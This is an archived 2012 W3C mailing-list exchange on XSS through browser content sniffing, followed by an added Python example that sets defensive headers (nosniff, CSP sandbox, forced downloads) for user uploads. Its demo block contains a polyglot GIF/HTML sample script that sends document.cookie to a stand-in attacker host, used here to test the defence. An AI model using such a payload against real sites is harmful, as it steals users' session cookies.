
RE: XSS through content-sniffing: good case for CSP sandbox directive

From: Hill, Brad <bhill@paypal-inc.com>
Date: Tue, 13 Mar 2012 01:06:48 +0000
To: Adam Barth <w3c@adambarth.com>
CC: "public-webappsec@w3.org" <public-webappsec@w3.org>
Message-ID: <370C9BEB4DD6154FA963E2F79ADC6F2E05F3E8@DEN-EXDDA-S12.corp.ebay.com>
Unless it's a content-type with by-design DOM access (Java, SWF, JS, PDF, etc.). This is a really common problem in systems designed to serve attachments and user-uploaded content: webmail, bulletin boards, SharePoint, etc.

> -----Original Message-----
> From: Adam Barth [mailto:w3c@adambarth.com]
> Sent: Monday, March 12, 2012 6:01 PM
> To: Hill, Brad
> Cc: public-webappsec@w3.org
> Subject: Re: XSS through content-sniffing: good case for CSP sandbox directive
> 
> On Mon, Mar 12, 2012 at 5:54 PM, Hill, Brad <bhill@paypal-inc.com> wrote:
> > http://www.garage4hackers.com/f11/gmail-xss-vulnerability-through-content-sniffing-2094.html?postcount=1
> >
> > A good example of the type of bug we could reduce the impact of with a
> > sandbox directive in CSP.
> 
> Or IE could just implement http://mimesniff.spec.whatwg.org/ and avoid all
> these vulnerabilities.
> 
> Adam
Received on Tuesday, 13 March 2012 01:07:19 GMT
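The following is an added example, not code from this thread, from Gmail, or from any product named in it. It models the two mitigations the exchange discusses for sites that serve user-uploaded content, a server-side opt-out of legacy content sniffing (X-Content-Type-Options: nosniff) and a Content-Security-Policy sandbox, together with the caveat in Brad Hill's reply: types that carry script by design (Java, SWF, JS, PDF) cannot be made safe by sandboxing a document and are returned only as a download. The extension table, the type sets, the 256-byte sniffing model and every function name are assumptions made for illustration, not any browser's or server's real behaviour.

```python
"""Response-header policy for serving user uploads (added example; the type
tables and the legacy-sniff model are assumptions for illustration)."""
import os
import re

# Assumed extension table. A real server uses an allow-list it controls and
# never trusts the Content-Type the uploader declared.
EXTENSION_TYPES = {
    ".png": "image/png", ".jpg": "image/jpeg", ".gif": "image/gif",
    ".txt": "text/plain", ".html": "text/html", ".svg": "image/svg+xml",
    ".js": "application/javascript", ".swf": "application/x-shockwave-flash",
    ".jar": "application/java-archive", ".pdf": "application/pdf",
}

# Types with script or DOM access by design (the reply's examples: java, swf,
# js, pdf, plus SVG, which can carry <script>). A CSP sandbox is a document
# mitigation; it is not a defence for content handed to a plugin or engine.
ACTIVE_BY_DESIGN = {
    "application/java-archive", "application/x-shockwave-flash",
    "application/javascript", "application/pdf", "image/svg+xml",
}

# Types this server is willing to render inline, always under a sandbox.
INLINE_OK = {"image/png", "image/jpeg", "image/gif", "text/plain", "text/html"}

_HTML_TAGS = re.compile(
    rb"<(?:html|script|body|head|iframe|object|embed|svg)[\s>]", re.I)


def legacy_sniff_is_html(body: bytes) -> bool:
    """Simplified model (an assumption, not a real browser algorithm) of the
    legacy behaviour behind the reported bug: scan the first 256 bytes and,
    if HTML tags appear, render as HTML whatever the Content-Type said."""
    return _HTML_TAGS.search(body[:256]) is not None


def safe_download_name(filename: str) -> str:
    """Reduce a user-controlled name to a token that is safe inside a quoted
    header parameter: no quotes, CR/LF, path separators or non-ASCII."""
    base = os.path.basename(filename) or "download"
    return re.sub(r"[^A-Za-z0-9._-]", "_", base)[:100]


def headers_for_upload(filename: str, body: bytes) -> dict:
    """Choose response headers for one uploaded file.

    Every response carries nosniff. Passive types are served inline but under
    'Content-Security-Policy: sandbox': with neither allow-scripts nor
    allow-same-origin, a body that a sniffing browser still treats as HTML
    runs no script and gets a unique origin, so it cannot reach the hosting
    site's cookies or DOM. Active-by-design and unknown types are forced to a
    download with an inert Content-Type.
    """
    ext = os.path.splitext(filename)[1].lower()
    ctype = EXTENSION_TYPES.get(ext, "application/octet-stream")
    headers = {"X-Content-Type-Options": "nosniff"}
    if ctype in INLINE_OK and ctype not in ACTIVE_BY_DESIGN:
        headers["Content-Type"] = ctype
        headers["Content-Security-Policy"] = "sandbox"
        headers["Content-Disposition"] = "inline"
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = (
            'attachment; filename="%s"' % safe_download_name(filename))
    return headers


def sniffed_as_html_by_legacy_client(body: bytes, headers: dict) -> bool:
    """Would our model of a legacy client end up rendering this as HTML?
    It honours nosniff and never sniffs a forced download; otherwise it
    applies the 256-byte tag scan above."""
    if headers.get("X-Content-Type-Options") == "nosniff":
        return False
    if headers.get("Content-Disposition", "").startswith("attachment"):
        return False
    return headers["Content-Type"] == "text/html" or legacy_sniff_is_html(body)


if __name__ == "__main__":
    # Constructed sample: an "avatar" whose bytes are really an HTML payload.
    evil_gif = (b"GIF89a<html><script>location='http://attacker.invalid/?'"
                b"+document.cookie</script>")
    naive = {"Content-Type": "image/gif"}          # no nosniff, no sandbox
    hardened = headers_for_upload("avatar.gif", evil_gif)
    print(sniffed_as_html_by_legacy_client(evil_gif, naive))     # True
    print(sniffed_as_html_by_legacy_client(evil_gif, hardened))  # False
    print(headers_for_upload("report.pdf", b"%PDF-1.4")["Content-Disposition"])
```

The sandbox header is deliberately sent even when nosniff is honoured: nosniff stops the misinterpretation, the sandbox limits what a misinterpreted body can do in clients that ignore it, and neither helps for the SWF/JAR/PDF case, which is why those fall through to the download branch.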